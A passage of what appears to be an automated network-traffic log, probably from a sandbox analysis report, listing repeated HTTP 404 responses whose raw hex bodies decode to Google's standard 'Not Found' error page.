64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:16 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:17 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:18 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Referrer-Policy: no-referrerContent-Length: 1575Date: Mon, 30 Sep 2024 14:10:20 GMTData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 